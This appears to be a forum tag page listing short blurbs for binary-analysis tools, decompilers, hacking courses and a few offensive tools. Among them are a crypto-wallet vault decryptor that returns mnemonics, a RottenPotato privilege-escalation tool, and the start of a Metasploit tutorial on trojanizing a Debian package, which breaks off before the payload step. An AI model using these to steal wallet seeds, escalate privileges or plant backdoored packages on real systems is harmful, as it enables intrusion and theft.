Showing results for tags 'binary'.


  1. MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates a YARA scanner. On Macro-enabled Office documents we can quickly use oletools mraptor to determine whether the document is malicious. If we want to dissect it further, we could bring in oletools olevba or oledump. To dissect malicious MSI files, so far we had only one, but reliable and trustworthy lessmsi. However, lessmsi doesn't implement features I was looking for: quick triage, binary data extraction, and YARA scanning. Hence this is where msidump comes into play. Here we can see that the input MSI is injected with suspicious VBScript and contains numerous executables in it. Now we want to take a closer look at this VBScript by extracting only that record.
  2. Binary Ninja is an interactive decompiler, disassembler, debugger, and binary analysis platform built by reverse engineers, for reverse engineers. Developed with a focus on delivering a high-quality API for automation and a clean and usable GUI, Binary Ninja is in active use by malware analysts, vulnerability researchers, and software developers worldwide. Decompile software built for many common architectures on Windows, macOS, and Linux for a single price, or try out our limited (but free!) Cloud version. 3.3.3996 (2023-01-18)
  3. Alcatraz is an x64 binary obfuscator that is able to obfuscate various different PE files, including .exe, .dll and .sys. Features: In the following showcase, all features (besides the one being showcased) are disabled.
  4. Decryptor cold wallets data, from extension Metamask, Ronin, Binance, Brave, etc. Best decrypter via Python, so fast work. Decrypt vault data from 0000.log file. Return mnemonic, derivation key, description. Many options.
  5. Binary Ninja Commercial 3.2.3814 (2022-10-28)

     Binary Ninja is an interactive disassembler, decompiler, and binary analysis platform for reverse engineers, malware analysts, vulnerability researchers, and software developers that runs on Windows, macOS, and Linux.

     Stable Branch Changelog

     Note that customers with an active support license can access more frequent updates in the dev channel. This changelog only includes stable build milestones.

     3.2.3814 (2022-10-28)

     Enhanced Windows Experience
     • Improved Enumerations
     • Next-Generation PDB Support
     • CFG Call Handling
     • MS Demangler Improvements
     Decompiler Improvements
     • Variable Merging/Splitting
     • Offset Pointers
     • Split Loads and Stores
     Objective-C Support
     Segments and Sections Editing UI
     Default to Clang Type Parser
     Named and Computer Licenses for Enterprise
     Documentation:
     • Vastly improved C++ API docs
     • New User Guide Layout

     UI Updates
     • Feature: Add “Restart and Reopen Files” command
     • Feature: “Run Script” Action and menu item
     • Feature: Add a recent file right-click menu for ‘Open with Options’
     • Feature: Lots of new “magic” console variables
     • Feature: Add “Zoom to Fit” and “Zoom to Cursor” hotkeys
     • Feature: Add various filtering options to StringsView
     • Feature: Add ‘Copy’ options in the ‘Strings’ and ‘Symbols’ views
     • Feature: Restore window layout and location when reopening files
     • Feature: Show list of imported libraries in TriageView and if they have TypeLibrary information or not
     • Feature: Hotkeys for toggling integer size “D” and sign “-” in TypesView
     • Feature: Kill to end of line hotkey in python console
     • Feature: Undo/Redo now show action summaries for what will be done or undone
     • Feature: New Light Theme (Summer)
     • Improvement: Configurable HLIL tab width
     • Improvement: Move exact match to top of symbol list if found
     • Improvement: Hotkeys now searchable in the keybindings menu
     • Improvement: Wayland support (partial)
     • Improvement: Consistency of hotkeys in StackView (1, 2, 3)
     • Improvement: Menu organization (1, 2)
     • Improvement: Allow programmatically closing a global area widget
     • Improvement: “firstnavigate”, prefer triage, and other potentially conflicting default options normalized and documented
     • Fix: Text rendering glitch in hex view on Windows
     • Fix: Default font on Windows along with other font related improvements
     • Fix: Create structure ‘S’ hotkey wasn’t appearing to work during analysis
     • Fix: Right-click losing selection
     • Fix: BN hangs when it fails to open a URL
     • Fix: SettingsView filtering bug when pasting search text
     • Fix: ‘Display As’ for array index annotations
     • Fix: Various theme handling fixes (1, 2)
     • Fix: x86 assembler on Windows
     • Fix: Missing linear view updates when creating analysis objects via API

     Binary View Improvements
     • Improvement: PE more in-depth parsing of the LoadConfig structure
     • Improvement: PE create a symbol for the __security_cookie
     • Improvement: PE make DataVariables for XFG hashes
     • Improvement: PE identify _guard_check_icall and _guard_check_icall_check and their pointers
     • Improvement: PE Demangle GNU3 (clang) Mangled Names
     • Improvement: ELF Thumb2 entry point detection
     • Improvement: Mach-O Create DataVariables for ‘dylib’ and ‘dylib_command’
     • Improvement: Mach-O Fix DYLIB and DYLD commands
     • Improvement: Mach-O Warn when encountering an unsupported INDIRECT_SYMBOL_LOCAL symbol
     • Fix: COFF loader does not respect address size when creating external symbols
     • Fix: COFF loader now recognizes (and stops loading) CIL and import library COFF files
     • Fix: PE Bug with parsing exception handlers
     • Fix: ELF hang when displaying DataVariables when section header count is too high

     Analysis
     • Feature: Added experimental option for keeping dead code branches
     • Feature: Setting to disable “pure” function call elimination
     • Feature: Add BinaryView metadata about which libraries have applied type information
     • Feature: Type extraction from mangled names is now optional
     • Feature: Recognition of thiscall and fastcall conventions on Win32 x86
     • Improvement: Add support for indirect tailcall translation
     • Improvement: Improved string detection
     • Improvement: HLIL to other IL and assembly mappings
     • Improvement: Resolve dereferencing a structure into accessing the first member
     • Improvement: Create structure references for unknown field offsets
     • Improvement: Propagate pointer child type to dereference expression
     • Improvement: Template simplifier (from 2.3) now enabled by default
     • Improvement: Range clamping to improve jump table detection
     • Improvement: Add additional no-return function to Platform types
     • Fix: Issue where function analysis could timeout unintentionally
     • Fix: Invalid HLIL under some conditions
     • Fix: Missing empty cases in switch statements
     • Fix: HLIL graph when only default case falls through
     • Fix: Crash when wide string ends without null at section boundary
     • Fix: Fix hang in Pseudo C
     • Fix: Crash when importing function type info from unknown type
     • Fix: Constant propagation from writable memory for constant arrays
     • Fix: Properly decode and render strings with BOMs
     • Fix: Prevent demangler from making function types with single ‘void’ parameter
     • Fix: Don’t allow demangled types to override Platform types
     • Fix: MS Demangler fix order of multidimensional arrays
     • Fix: MS Demangler properly set calling convention
     • Fix: MS Demangler disambiguate int/long
     • Fix: MS Demangler add implicit ‘this’ pointer when demangling ‘thiscall’
     • Fix: MS Demangler demangle SwiftCallingConvention

     API
     • New API: Merge and split variables
     • New API: Variable liveness API for determining soundness of merging/splitting variables
     • New API: Components class and notifications
     • New API: Get and set offset pointers
     • New API: Implement .tokens property on HLIL
     • New API: Function.get_variable_by_name
     • New API: Get and delete for DebugInfo API
     • New API: CallingConvention::GetVariablesForParameters
     • New API: BinaryView.get_default_load_settings
     • New API: Interaction.run_progress_dialog
     • New API: Function.is_thunk
     • New API: Notifications for Segment/Section Added/Updated/Removed
     • New API: Function.caller_sites
     • New API: HLIL_UNREACHABLE
     • New Example: Feature map
     • Improvement: Add progress callback to DebugInfo::ParseInfo
     • Improvement: Implement missing APIs in BinaryNinja::Metadata
     • Improvement: Add channel to core_version_info
     • Improvement: DebugInfo.parse_debug_info returns a boolean
     • Improvement: Many type hint additions and fixes
     • Improvement: Python/C++ APIs to get registers, register stacks, and flags for LLIL
     • Improvement: Allow DataVariable.name to be assigned a QualifiedName
     • Improvement: Added a significant amount of C++ API Documentation
     • Improvement: New theme for C++ documentation
     • Improvement: Allow passing QualifiedNameType instead of QualifiedName to many functions
     • Deprecation: BinaryViewTypeArchitectureConstant
     • Deprecation: BNLogRegisterLoggerCallback
     • Fix: Variable use/def API for aliased variables
     • Fix: Platform.os_list
     • Fix: DebugInfo.function
     • Fix: issue where EnumerationBuilder couldn’t set the width of the enumeration
     • Fix: BinaryView.get_functions_by_name to handle cases like sub_main
     • Fix: Trying to delete incomplete LowLevelILFunction
     • Fix: stack_adjustment.setter
     • Fix: Type annotation & documentation for define_auto_symbol_and_var_or_function
     • Fix: Issue where notification callbacks were not being called
     • Fix: missing debugger_imported definition in PythonScriptingInstance
     • Fix: Python exceptions when accessing functions with skipped IL analysis
     • Fix: Class hierarchy of HLILRet
     • Fix: Core parser not parsing struct __packed foo
     • Fix: Ignore UI plugins when loaded in headless

     Types
     • Fix: Make _Unwind_Resume() __noreturn

     Architectures
     • Armv7/Thumb2: Critical improvement to analysis of armv7/thumb2 call sites to respect callee function types
     • Armv7/Thumb2: Proper lifting for Thumb2 LDM and STR with Rn not included in register list
     • Armv7/Thumb2: Add lifting for SMULxx instruction forms
     • Armv7/Thumb2: Fix lifting of certain uses of flexible operands (Thank you @ehntoo)
     • Armv7/Thumb2: Fix crash on MSR banked instruction
     • Armv7/Thumb2: Fix PC-relative alignment issue
     • Armv7/Thumb2: Lift msr to basepri as __set_BASEPRI
     • Armv7/Thumb2: Added vmov immediate lifting (Thank you @ehntoo)
     • Armv7/Thumb2: Fix size of vstr storage (Thank you @ehntoo)
     • Arm64: Corrected lifting of *ZR target register
     • Arm64: Lifted load-acquire, store-release instructions
     • MIPS: Properly handle delay slot rewriting with call targets (Thank you @yrp)
     • MIPS: Lifted madd, maddu (Thank you @yrp)
     • x86/x86_64: int 0x29 now ends basic blocks

     Debugger
     • Feature: Add support for remote Windows/macOS/Linux debugging
     • Feature: Add basic support for iOS/Android remote debugging
     • Improvement: New breakpoint sidebar widget icon
     • Improvement: Remain in the debugger sidebar after launching the target or ending the debugging
     • Improvement: Register widget refactor
     • Improvement: Put the debugger breakpoints widget and registers widgets into a tab widget
     • Improvement: Modules widget refactor
     • Improvement: Status bar widget refactor
     • Improvement: Add history entries support for target console and debugger console
     • Fix: Windows x86 debugging
     • Fix: Invert debugger icon colors and fix panel icon to not be grayscale
     • Fix: Memory leak after using the debugger

     Plugins/Plugin Manager
     • Improvement: Prioritize plugin name in search filtering
     • Improvement: More robust against offline networks and captive portals
     • Improvement: Settings to allow disabling official and community plugin repositories

     Enterprise
     • Feature: Named and computer licenses are now available for Enterprise
     • Feature: Project files may now be stored in folders
     • Feature: The Enterprise server is now deployable with Docker Swarm
     • Feature: The Enterprise server is now deployable with custom SSL certificates
     • Improvement: Databases and files can now be downloaded directly from the files list without opening the database first
     • Improvement: Syncing has been made significantly faster by avoiding unnecessary analysis cache downloads
     • Improvement: A “skip” button has been added on initial launch to avoid waiting for server connection while offline
     • Improvement: Changed the way Enterprise server deployments work to allow additional flexibility and customization
     • Improvement: Enterprise client updates can now be downloaded and synced to the Enterprise server for only specific platforms
     • Fix: The initial login window now correctly responds to other ways to close a window (e.g. Cmd-Q)
     • Fix: Disabling plugins via the -p switch is now correctly supported in Enterprise
     • Fix: Fixed multiple client crashes related to UI and networking
     • Fix: The Enterprise server now correctly works with the compose sub-command included with newer versions of Docker
  6. Become an expert and professional ethical hacker! Learn Network Security, Kali Linux, and other topics that nobody knows

     What you’ll learn
     • Ethical Hacking Masterclass : From Zero to Binary Deep
     • Fundamentals of Ethical Hacking
     • Linux Permission Management
     • Linux Network Manipulation
     • Maltego
     • Linux Software control
     • Manage Linux Processes
     • Linux Delete Files without traces
     • Passive Information Gathering

     Requirements
     • 4GB of RAM for Running VMWare and other programs

     Description

     *Printable online certificate available upon completion of course*

     Since the infancy of computers, hackers have been creatively solving problems. In the late 1950s, the MIT model railroad club was given a donation of parts, mostly old telephone equipment. The club’s members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing into the appropriate sections. They called this new and inventive use of telephone equipment hacking; many people consider this group to be the original hackers. The group moved on to programming on punch cards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with writing programs that just solved problems, the early hackers were obsessed with writing programs that solved problems well. A new program that could achieve the same result as an existing one but used fewer punch cards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Hacker is a term for both those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. Since an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. Hacking is really just the act of finding a clever and counterintuitive solution to a problem.
Program exploitation is a staple of hacking. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. You can get started in white-hat ethical hacking using Kali Linux, and this course starts you on that road by giving you an overview of security trends, where you will learn about the OSI security architecture. This will form the foundation for the rest of Beginning Ethical Hacking with Kali Linux. With the theory out of the way, you’ll move on to an introduction to VirtualBox, VMWare, networking terminologies, and common Linux commands, followed by the step-by-step procedures to build your own web server and acquire the skill to be anonymous. When you have finished the examples in the first part, of course, you will have all you need to carry out safe and ethical hacking experiments. After an introduction to Kali Linux, you will carry out your first penetration tests with Python and code raw binary packets for use in those tests. You will learn how to find secret directories of a target system, how to use a TCP client in Python and services, and how to do port scanning using Nmap. Along the way, you will learn how to collect important information; how to track e-mail; and how to use important tools such as Dmitry, Maltego, and others. You’ll also take a look at the five phases of penetration testing. After that, this course will cover SQL mapping and vulnerability analysis where you will learn about sniffing and spoofing, why ARP poisoning is a threat, how SniffJoke prevents poisoning, how to analyze protocols with Wireshark, and how to use sniffing packets with Scapy. Then, you will learn how to detect SQL injection vulnerabilities, how to use Sqlmap, and how to do brute-force or password attacks. 
In addition, you will learn how to use important hacking tools such as OpenVas, Nikto, Vega, and Burp Suite. Who this course is for: Beginner Ethical Hackers who want to learn more
  7. Binary Ninja is an interactive disassembler, decompiler, and binary analysis platform for reverse engineers, malware analysts, vulnerability researchers, and software developers that runs on Windows, macOS, Linux.

     • Disassemble: Disassemble executables and libraries from multiple formats, platforms, and architectures.
     • Decompile: Decompile code to C or BNIL for any supported architecture - including your own.
     • Automate: Automate analysis with C++, Python, and Rust APIs from inside or outside the UI.
     • Analyze: Visualize control flow and navigate through cross-references interactively.
     • Annotate: Name variables and functions, apply types, create structures, and add comments.
     • Collaborate: Collaborate effortlessly with synchronized commits using our Enterprise product.

     Disassemble Files
     Vector 35 provides first-party support for disassembly from multiple architectures, including x86, x86-64, ARMv7 (with Thumb2), ARMv8 (AArch64), PowerPC, 6502, Z80, and MIPS. Additionally, our community supports many other architectures through our public plugin ecosystem. Loaders are available for all major platforms (PE, Mach-O, ELF) and can be extended or customized using our API.

     Decompile Code
     Our built-in decompiler works with all of our officially supported architectures at one price and builds on a powerful family of ILs called BNIL. In fact, not just our architectures, but even community architectures can produce amazing decompilation. Our decompiler outputs to both C and BNIL and can be switched on-demand.

     Automate Anything
     Our extensive API can be used to create and customize loaders, add or augment architectures, customize the UI, or automate any workflow (types, patches, decompilation…anything!). Bindings are available for C++, Python, and Rust.

     Create Plugins
     Made something cool and want to share? Publish your community plugin and have it featured in our Plugin Manager! These plugins can be installed (or updated) at any time by any customer, right inside the client.

     Triage Quickly
     Use our API to quickly batch process files and see the results in our triage view. Use the entropy graph to identify areas of interest, like packed or encrypted data. Click on any location to navigate there quickly.

     Explore Interactively
     We didn’t just build the best automation and API for binary analysis, but our UI design is intentional and clean. None of the distractions, but all of the features you need for the biggest jobs including multiple tabs, synchronized and split views, custom layouts and more.

     Annotate Everything
     Reverse engineering is the process of exploring the unknown. As your understanding improves, we give you the tools to represent that and improve analysis. Add types, structures, comments, highlights, tags, and more.

     Patch Effectively
     Make binary patches quickly and effectively with a variety of tools purpose-built for speed. Edit lines of assembly directly, select a preset patch, edit raw bytes with our hex editor view, or even compile C into the executable directly with our own built-in compiler, SCC.

     Switch Platforms
     You’ll never be stuck. Binary Ninja not only runs seamlessly on Windows, macOS, and Linux, but every purchase includes all three platforms for one price.

     Run Headlessly
     No need to only do your analysis inside of Binary Ninja. Instead, bring Binary Ninja into your analysis environment. Use the Python REPL of your choice, or even statically compile our core analysis library into an existing framework; our analysis can be completely untethered from the UI.
  8. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License.

     Changelog v0.11.1

     This maintenance release provides minor enhancements and bugfixes, including:
     • More ARM32 rewriters.
     • More uses of generic IntrinsicProcedures.
     • Replace recursive SccFinder with a non-recursive implementation.
     • Initial support for Terse Executable format.
     • Don’t try tracing into nonexecutable code.
     • Ctrl+0 resets the zoom level of the Graph Viewer
     • Many more PowerPC instructions supported
     • C parser issues reported by @smx-smx
     • Make SSA analysis use bit-accurate analysis for stack variables.
     • Multithreaded robustness.

     It also has some refactorings and new classes, setting the stage for a future refactoring of the Scanner:
     • New RtlSwitch subclass of RtlInstruction
     • Support for platform-specific patterns for procedure entries.
  9. Overview: Patching assembly code to change the behavior of an existing program is not uncommon in malware analysis, software reverse engineering, and broader domains of security research. This project extends the popular IDA Pro disassembler to create a more robust interactive binary patching workflow designed for rapid iteration. This project is currently powered by a minor fork of the ubiquitous Keystone Engine, supporting x86/x64 and Arm/Arm64 patching with plans to enable the remaining Keystone architectures in a future release. Special thanks to Hex-Rays for supporting the development of this plugin.
  10. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License.
  11. RevPTC, a professional Multilevel Marketing Solution that comes with pay per click (PPC) system. It’s developed for those people who want to start their Multilevel business website with additional PTC features. Globally, 60 million people work as network marketers & 36.6 million customers have bought products/services from the network marketing model. It’s an industry and here today we keep our footprint on this industry with our RevPTC, a complete solution for multilevel marketing business. Here, marketers and users can join via referral system, by using upline username, can manage their downline, able to choose plans, earn referral commissions, withdraw their earning, earn by clicking ads and more.
  12. New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.

      RottenPotatoDLL
      This project generates a DLL and EXE file. The DLL contains all the code necessary to perform the RottenPotato attack and get a handle to a privileged token. The MSFRottenPotatoTestHarness project simply shows example usage for the DLL. For more examples, see [Hidden Content], specifically the SeAssignPrimaryTokenPrivilege.cpp and SeImpersonatePrivilege.cpp files.

      RottenPotatoEXE
      This project is identical to the above, except the code is all wrapped into a single project/binary. This may be more useful for some penetration testing scenarios. Modify the "main" method in MSFRottenPotato.cpp to change what command will be run. By default it just runs cmd.exe to pop a command shell.
  13. IDA2Obj is a tool to implement SBI (Static Binary Instrumentation). The working flow is simple:
      • Dump object files (COFF) directly from one executable binary.
      • Link the object files into a new binary, almost the same as the old one.
      • During the dumping process, you can insert any data/code at any location.
      SBI is just one of the usage scenarios, especially useful for black-box fuzzing.
  14. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License.

      Changelog v0.10.1

      This maintenance release moves Reko from .NET Core 3.1 to .NET 5.0, resulting in some performance gains. It also fixes the MSI installers for Windows, which had several issues (including #1066 and #1067). Special thanks to @smx-smx for his work on his CI integration work.
      • The Reko build system now assumes C# 9.0
      • Crude support for #define directives in the Reko C parser
      • Overhaul of PA-RISC and HP SOM loader
      • The command line driver --version switch displays the git hash used to build the binary.
      • Improvements in AArch64 disassembler and rewriter (with @rfalke as a driving force)
  15. FindYara: Use this IDA python plugin to scan your binary with Yara rules. All the Yara rule matches will be listed with their offset so you can quickly hop to them!

      Using FindYara
      The plugin can be launched from the menu using Edit->Plugins->FindYara or using the hot-key combination Ctrl-Alt-Y. When launched, FindYara will open a file selection dialogue that allows you to select your Yara rules file. Once the rule file has been selected, FindYara will scan the loaded binary for rule matches. All rule matches are displayed in a selection box that allows you to double click the matches and jump to their location in the binary.
  16. Karta - source code assisted fast binary matching plugin for IDA.
  17. Reko (Swedish: "decent, obliging") is a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary.
  18. Become an expert and professional ethical hacker! Learn Network Security, Kali Linux and other topics that nobody knows

      What you'll learn
      • Fundamentals of Ethical Hacking
      • Linux Permission Management
      • Linux Network Manipulation
      • Maltego
      • Linux Software control
      • Manage Linux Processes
      • Linux Delete Files without traces
      • Passive Information Gathering

      Requirements
      • 4GB of RAM for Running VMWare and other programs

      Description

      *Printable online certificate available upon completion of course*

      Since the infancy of computers, hackers have been creatively solving problems. In the late 1950s, the MIT model railroad club was given a donation of parts, mostly old telephone equipment. The club’s members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing in to the appropriate sections. They called this new and inventive use of telephone equipment hacking; many people consider this group to be the original hackers. The group moved on to programming on punch cards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with writing programs that just solved problems, the early hackers were obsessed with writing programs that solved problems well. A new program that could achieve the same result as an existing one but used fewer punch cards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Hacker is a term for both those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. Since an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. There are interesting hacks found in both the techniques used to write elegant code and the techniques used to exploit programs.
Hacking is really just the act of finding a clever and counterintuitive solution to a problem. Program exploitation is a staple of hacking. As demonstrated in the previous in this course, a program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it’s designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. You can get started in white-hat ethical hacking using Kali Linux, and this course starts you on that road by giving you an overview of security trends, where you will learn about the OSI security architecture. This will form the foundation for the rest of Beginning Ethical Hacking with Kali Linux. With the theory out of the way, you’ll move on to an introduction to VirtualBox, VMWare, networking terminologies, and common Linux commands, followed by the step-by-step procedures to build your own web server and acquire the skill to be anonymous. When you have finished the examples in the first part of course, you will have all you need to carry out safe and ethical hacking experiments. After an introduction to Kali Linux, you will carry out your first penetration tests with Python and code raw binary packets for use in those tests. You will learn how to find secret directories of a target system, how to use a TCP client in Python and services, and how to do port scanning using Nmap. 
Along the way, you will learn how to collect important information; how to track e-mail; and how to use important tools such as DMitry, Maltego, and others. You’ll also take a look at the five phases of penetration testing. After that, this course will cover SQL mapping and vulnerability analysis where you will learn about sniffing and spoofing, why ARP poisoning is a threat, how SniffJoke prevents poisoning, how to analyze protocols with Wireshark, and how to use sniffing packets with Scapy. Then, you will learn how to detect SQL injection vulnerabilities, how to use Sqlmap, and how to do brute-force or password attacks. In addition, you will learn how to use important hacking tools such as OpenVas, Nikto, Vega, and Burp Suite. Who this course is for: Beginner Ethical Hackers who want to learn more
  19. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files. A central tenet is that Reko is extensible: wherever possible, we strive to avoid hard-coding knowledge about specific platforms, processors, or file formats in the core decompiler. Instead, such special knowledge is farmed out in separate assemblies. Examples: Reko.Arch.X86.dll – provides support for disassembling Intel X86 binaries. Reko.ImageLoaders.MzExe.dll – understands how to load MS-DOS executable files and all related formats Reko.ImageLoaders.Elf.dll – understands the ELF executable file format. 
Changelog v0.9.3 This is the last time Reko is released for .NET Framework and Mono. Future releases will be based on .NET Core and .NET 5 The release consists of minor feature enhancements and bug fixes. Initial support for IA-64 and v850 support Support for the MIL-STD-1750, XCore-200, CompactRisc, MCore and Hexagon architectures Rewrite Reko’s MemoryArea abstraction to support non-byte-oriented architectures (like Cray YMP and MIL-STD-1750) As usual, more x86 rewriters (with thanks to @smx-smx) Improved Sparc, zSeries, and Risc-V disassemblers Fuse adjacent memory accesses x86 and GUI support for specifying separate architecture models. Unpacker script for Exepack 3.60 et al. Loader for preprocessed C headers, making it possible to use such headers as metafiles in Reko projects (with thanks to @ptomin) User-supplied labels (#987) Register Values dialog (#950) Support for the TekHex and LDM text file formats Support for Unicos binary executables. Support for PharLap DOS Extender executables (with thanks to @gbody)
  20. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files.
  21. Binary Ninja assistant plugin for vulnerability research. Description: This plugin aims to assist during the vulnerability research process by providing a full tracing of sources of parameters to selected functions. It also provides a scanning capability which uses the function tracer and applies several rules to detect potentially dangerous function calls. Author: Martin Petran Scanner is using set of rules and function tracker to perform basic analysis to detect any potentially vulnerable function calls. Issues that are found by this component are marked with tags that reflect the priority for a follow-up manual analysis. Following are the priority categories: 🔴 High - Detected conditions are likely to lead to vulnerability. 🟠 Medium - Detected conditions could theoretically lead to vulnerability. 🟡 Low - Detected conditions are unlikely to lead to vulnerability. 🔵 Info - Detected conditions were not clear enough to determine if the call is secure or not.
  22. Features The binary multi-tool and reversing platform All Reverse Engineering API Powerful Editing Performance Hex Editor
  23. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Changelog v0.9.1 This is a minor release, but with a lot of new small features and fixes. A noteworthy new feature is Reko’s ability to automatically place decompiled procedures into different files, based on an OutputFilePolicy. An OutputFilePolicy decides into which files procedures should go, based on criteria like segment name, address offset within a segment etc. Future work will allow users to customize the placements on a per-procedure basis. The project has partially completed moving .csproj files to the new .NET SDK format (issue #748). Most files are now building to the netstandard2.0 target framework. Progress is stalled due to the complex Reko build process. If you’re interested in helping us get ready for .NET 5, contact the Reko team at [Hidden Content].
Initial support was added for the following CPU instruction set architectures: Motorola 6809 WE32100 LatticeMico32 ARC, ARCompact Mips16e Other noteworthy new features include: Support for 16-bit OS/2 executables (with thanks to @claunia) Introduced rudimentary LE/LX executable support (with thanks to @claunia) Introduced support for Nintendo Switch (with thanks to @smx-smx) Enhancements to Xbox370 XEX executable loader (with thanks to @smx-smx) Apply relocations to MacOS classic A5 world (with thanks to @gbody) Implement finding ASCII and UTF-8 strings (with thanks to @ermshiperete) Stability and bug fixes in SSA transform (with thanks to @ptomin) Introduced 6502 emulator for handling C64 unpackers. Introduced support for CodeView debugging information. Introduced support for Commodore 64 T64 file format and MorphOS binaries. Introduced OMF library loader New AssembleAt method will allow patching of code with assembler language Handle Windows VxD dynamic linking fixups Fixes to i8051, ARM, M68k, PowerPC, X86 disassemblers and rewriters Changes to the C parser to handle Microsoft and IBM-specific extensions (__far, __near, __pascal, etc) Support for Microsoft Binary Format (5-byte floating point numbers) Generalized OllyDbg support to handle non-x86 architectures.
  24. Reko (Swedish: “decent, obliging”) is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License. The project consists of front ends, the core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary. Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. Reko consists of a central .NET assembly Reko.Decompiler.dll which contains the central core logic. Leaving aside the user interface for a moment, the Reko can at a glance be considered a pipeline. The first stage of the pipeline loads the executable we wish to decompile. Later stages perform different kinds of analyses, extracting information from the machine language where they can and aggregating it into structured information (such as Procedures and data types). The final stage is the output stage, where the source code is emitted into files. A central tenet is that Reko is extensible: wherever possible, we strive to avoid hard-coding knowledge about specific platforms, processors, or file formats in the core decompiler. Instead, such special knowledge is farmed out in separate assemblies. Examples: Reko.Arch.X86.dll – provides support for disassembling Intel X86 binaries. Reko.ImageLoaders.MzExe.dll – understands how to load MS-DOS executable files and all related formats Reko.ImageLoaders.Elf.dll – understands the ELF executable file format.
  25. In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. root@kali:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... root@kali:~# mkdir /tmp/evil root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil root@kali:~# cd /tmp/evil/ root@kali:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work root@kali:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: root@kali:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. In our DEBIAN directory, we’ll 